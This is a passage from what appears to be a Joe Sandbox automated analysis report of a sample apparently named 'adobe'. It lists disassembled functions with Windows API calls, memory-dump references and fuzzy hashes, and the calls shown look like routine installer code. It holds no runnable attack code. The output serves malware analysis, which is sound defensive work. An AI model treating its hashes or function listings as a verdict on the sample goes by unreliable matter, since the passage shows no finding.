                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$EnableEnabledVisible
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3234591441-0
                                                                                                                                                          • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                                                                                          • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                                                                                                          • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                                                                                          • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00480D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetActiveWindow.USER32(?), ref: 00480E0E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ActiveWindow
                                                                                                                                                          • String ID: InitializeWizard
                                                                                                                                                          • API String ID: 2558294473-2356795471
                                                                                                                                                          • Opcode ID: de91dab70681d844d28204161b141a469312065f9c2e90e1064e61b7339a4e9a
                                                                                                                                                          • Instruction ID: 0b95fc32d463599106473d5585650a8af358dd80bcac62c86fd07979e218b19d
                                                                                                                                                          • Opcode Fuzzy Hash: de91dab70681d844d28204161b141a469312065f9c2e90e1064e61b7339a4e9a
                                                                                                                                                          • Instruction Fuzzy Hash: CB119D302142049FD310EBAAFD42B1E7BA4E716728F10447BE804D76A1EB796C64CB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047B1C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B406,00000000,0047B540), ref: 0047B205
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047B1D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                          • API String ID: 47109696-1019749484
                                                                                                                                                          • Opcode ID: 4114cd683091933fe49415c0c50bb4c54809aa79fa0bcf10601736be04f09168
                                                                                                                                                          • Instruction ID: 22c72f1ff155fe51a1e4b505a8227949295a7cd5e59db6d8f16ea4f3083837ab
                                                                                                                                                          • Opcode Fuzzy Hash: 4114cd683091933fe49415c0c50bb4c54809aa79fa0bcf10601736be04f09168
                                                                                                                                                          • Instruction Fuzzy Hash: 59F0897170451867D700A5DA5C46B9E669DCB84718F20407BF508DB343DAB99D0203DC
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046E02C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E6AA,?,?,00000000,0046E840,?,_is1,?), ref: 0046E03F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: NoModify
                                                                                                                                                          • API String ID: 3702945584-1699962838
                                                                                                                                                          • Opcode ID: c91bb8390a179d2518080c17e4406ccc72a50bd5ac54a06ac17507637b62d986
                                                                                                                                                          • Instruction ID: f0f3608ed547cc333ffef6632fe60bcb7ab783db0a368fb437208b4f6334264f
                                                                                                                                                          • Opcode Fuzzy Hash: c91bb8390a179d2518080c17e4406ccc72a50bd5ac54a06ac17507637b62d986
                                                                                                                                                          • Instruction Fuzzy Hash: FAE04FB4600304BFEB04EB95CD4AF6B77ECDB48710F104059BA049B2C1E674EE00C668
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045364C Relevance: 3.2, APIs: 2, Instructions: 190fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045387F,?,00000000,004538E9,?,?,-00000001,00000000,?,0047BA45,00000000,0047B994,00000000), ref: 0045385B
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00453886,0045387F,?,00000000,004538E9,?,?,-00000001,00000000,?,0047BA45,00000000,0047B994,00000000,00000001), ref: 00453879
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2066263336-0
                                                                                                                                                          • Opcode ID: eaa0cc0d37466db83b7378a61d8ab9191ace993c3658d7bbc7356b17c3ba3b9c
                                                                                                                                                          • Instruction ID: e2366e05c35014b16e4179b3a35018bf351f0d04ff8316dee8ab98ed304049b6
                                                                                                                                                          • Opcode Fuzzy Hash: eaa0cc0d37466db83b7378a61d8ab9191ace993c3658d7bbc7356b17c3ba3b9c
                                                                                                                                                          • Instruction Fuzzy Hash: 8881A47090424DAFCF15EF55C8407EFBBB4AF49346F1480AAE85467392D3399B4ACB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047CB90 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047CE6F,?,-0000001A,0047EDCE,-00000010,?,00000004,0000001A,00000000,0047F11B,?,0045D388), ref: 0047CC06
                                                                                                                                                            • Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E), ref: 0042E253
                                                                                                                                                            • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                                                                                            • Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                                                                                                          • SendNotifyMessageA.USER32(00020466,00000496,00002711,-00000001), ref: 0047CDD6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2685184028-0
                                                                                                                                                          • Opcode ID: fe334f644459717bfbf4afd4f15e41703215b1e70e8f6aa107e3ed3cc630e592
                                                                                                                                                          • Instruction ID: 159e6411eecd54bbf62f5d649944b6adb8f27d330611ae1ee8a959584b2ccba9
                                                                                                                                                          • Opcode Fuzzy Hash: fe334f644459717bfbf4afd4f15e41703215b1e70e8f6aa107e3ed3cc630e592
                                                                                                                                                          • Instruction Fuzzy Hash: F75172342001009BC721FF2AE9C568B7BE9EB54309B50C53FA8499B7A6C73CDD468B9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402088 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB
                                                                                                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 296031713-0
                                                                                                                                                          • Opcode ID: ab36081b635f180fcbd9c72ddfa2df4ff1194ff7a3e80535640a75ab74e64123
                                                                                                                                                          • Instruction ID: 43da59c6024c014fdcfbd4f667e22ace29d18c19eb36fc191a59cc880b6cb292
                                                                                                                                                          • Opcode Fuzzy Hash: ab36081b635f180fcbd9c72ddfa2df4ff1194ff7a3e80535640a75ab74e64123
                                                                                                                                                          • Instruction Fuzzy Hash: C941F4B2E003409FDB10CF68DD8921A77A4F7A8328F15417BD844A77E1D3B89851CB89
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DB28 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3660427363-0
                                                                                                                                                          • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                                                                          • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                                                                                                          • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                                                                          • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DDE8 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEnum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2818636725-0
                                                                                                                                                          • Opcode ID: 4f2ca0f2844ab6484133a529d123ab7a4672b024258e86c6ade1300004d9a857
                                                                                                                                                          • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                                                                                                          • Opcode Fuzzy Hash: 4f2ca0f2844ab6484133a529d123ab7a4672b024258e86c6ade1300004d9a857
                                                                                                                                                          • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindFree
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4097029671-0
                                                                                                                                                          • Opcode ID: b98da3a4fc1bdf2447d357c19413e6e4fb323061471e88bf3521ae634e34e4c2
                                                                                                                                                          • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                                                                                                          • Opcode Fuzzy Hash: b98da3a4fc1bdf2447d357c19413e6e4fb323061471e88bf3521ae634e34e4c2
                                                                                                                                                          • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004522F0 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452332
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452358), ref: 0045233A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastMove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 55378915-0
                                                                                                                                                          • Opcode ID: 97243ea131f7e615965f3b4c998cd639dcaee1aebf6cb28d0d97209af4e9fe74
                                                                                                                                                          • Instruction ID: 9dc6be0a43312f787551d7621e84e5f1cbe43add256c0caa6dae814d5531f3df
                                                                                                                                                          • Opcode Fuzzy Hash: 97243ea131f7e615965f3b4c998cd639dcaee1aebf6cb28d0d97209af4e9fe74
                                                                                                                                                          • Instruction Fuzzy Hash: 0101D671B04204AB8B00DB7A9D414AEB7ECDB89725750457BFC08E3242EA7C5E098559
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00451DE0 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E3F), ref: 00451E19
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451E3F), ref: 00451E21
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                          • Opcode ID: 9c633ffd2730be144555f8e166e3da3e4b6d19e01f2cb78139bc1df7f376b4ab
                                                                                                                                                          • Instruction ID: 5fcceeafc3bf0a8a0ab19b2a667eb9dbaa6c6a95428f386d4b5c3ef860233f0d
                                                                                                                                                          • Opcode Fuzzy Hash: 9c633ffd2730be144555f8e166e3da3e4b6d19e01f2cb78139bc1df7f376b4ab
                                                                                                                                                          • Instruction Fuzzy Hash: D6F02271A00208ABCB00EFB59C42AAEB3E8DB49311F5045B7FC04E3292E67D5E088698
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00451F78 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00451FD5,?,-00000001,?), ref: 00451FAF
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00451FD5,?,-00000001,?), ref: 00451FB7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2018770650-0
                                                                                                                                                          • Opcode ID: ea08452e2cf790cd4843b13ce774bb785cd5b8944d5698c9d7ced65edc9dc9fc
                                                                                                                                                          • Instruction ID: 3a6aef72c926bc74b3f5ffd68857e1a70631f8bc3b8d107904d8cc5ac4359f01
                                                                                                                                                          • Opcode Fuzzy Hash: ea08452e2cf790cd4843b13ce774bb785cd5b8944d5698c9d7ced65edc9dc9fc
                                                                                                                                                          • Instruction Fuzzy Hash: FEF0C872A04604AFCB00EFB5AC415AEB7E8DB48315B5145B7FC04E3662E7385E188598
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00452150 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004521AF,?,?,00000000), ref: 00452189
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,004521AF,?,?,00000000), ref: 00452191
